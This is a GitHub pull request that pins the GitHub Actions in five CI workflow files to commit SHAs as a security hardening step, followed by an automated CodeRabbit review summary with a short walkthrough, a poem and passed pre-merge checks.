fix: harden GitHub Actions workflows

[dagecko]

Re-submission of #529. Had a problem with my fork and had to delete it, which closed the original PR. Apologies for the noise.

Summary

This PR pins all GitHub Actions to immutable commit SHAs instead of mutable version tags and extracts any unsafe expressions from run blocks into env mappings.

How to verify

Review the diff, each change is mechanical and preserves workflow behavior:

• SHA pinning: action@v3 becomes action@abc123 # v3, original version preserved as comment
• No workflow logic, triggers, or permissions are modified

I've been researching CI/CD supply chain attack vectors and submitting fixes to affected repos. Based on that research I built a scanner called Runner Guard and open sourced it here so you can scan yourself if you want to. I'll be posting more advisories over the next few weeks on Twitter if you want to stay in the loop.

If you have any questions, reach out. I'll be monitoring comms.

- Chris (dagecko)

Summary by CodeRabbit

• Chores
  • Updated continuous integration workflow configurations to use pinned action versions for improved stability and security across testing, linting, and publishing pipelines.

[coderabbitai]

No actionable comments were generated in the recent review. 🎉

ℹ️ Recent review info

⚙️ Run configuration

Configuration used: defaults

Review profile: CHILL

Plan: Pro

Run ID: f2295b73-3043-4c33-a959-34e0ff55a130

📥 Commits

Reviewing files that changed from the base of the PR and between 1e1a4ad and 5b3c678.

📒 Files selected for processing (5)

• .github/workflows/e2e_android.yml
• .github/workflows/e2e_ios.yml
• .github/workflows/lint.yml
• .github/workflows/publish.yml
• .github/workflows/test.yml

---

📝 Walkthrough

Walkthrough

GitHub Actions workflows across the repository are updated to pin action versions to specific commit SHAs instead of using floating version tags (v1, v2), ensuring reproducible CI/CD builds by locking Bun, Android emulator, and Xcode setup actions to exact versions.

Changes

Cohort / File(s)	Summary
Bun Setup Action Pinning .github/workflows/e2e_android.yml, .github/workflows/e2e_ios.yml, .github/workflows/lint.yml, .github/workflows/publish.yml, .github/workflows/test.yml	oven-sh/setup-bun@v2 pinned to specific commit SHA 0c5077e51419868618aeaa5fe8019c62421857d6 across all workflows with inline version comment.
Other CI/CD Action Pinning .github/workflows/e2e_android.yml, .github/workflows/e2e_ios.yml	reactivecircus/android-emulator-runner@v2 and maxim-lobanov/setup-xcode@v1 pinned to specific commit SHAs to lock action versions.

Poem

🐰 Floating tags we've left behind,
Commit hashes, firmly pinned!
Builds reproducible, workflows refined,
Certainty in every CI bind! ✨

Estimated code review effort

🎯 1 (Trivial) | ⏱️ ~3 minutes

🚥 Pre-merge checks | ✅ 3

✅ Passed checks (3 passed)

Check name	Status	Explanation
Description Check	✅ Passed	Check skipped - CodeRabbit’s high-level summary is enabled.
Title check	✅ Passed	The title 'fix: harden GitHub Actions workflows' clearly and specifically describes the main objective of the changeset—pinning GitHub Actions to commit SHAs to improve security.
Docstring Coverage	✅ Passed	No functions found in the changed files to evaluate docstring coverage. Skipping docstring coverage check.

_{✏️ Tip: You can configure your own custom pre-merge checks in the settings.}

✨ Finishing Touches

🧪 Generate unit tests (beta)

• Create PR with unit tests

---

Thanks for using CodeRabbit! It's free for OSS, and your support helps us grow. If you like it, consider giving us a shout-out.

❤️ Share

• X
• Mastodon
• Reddit
• LinkedIn

_{Comment @coderabbitai help to get the list of available commands and usage tips.}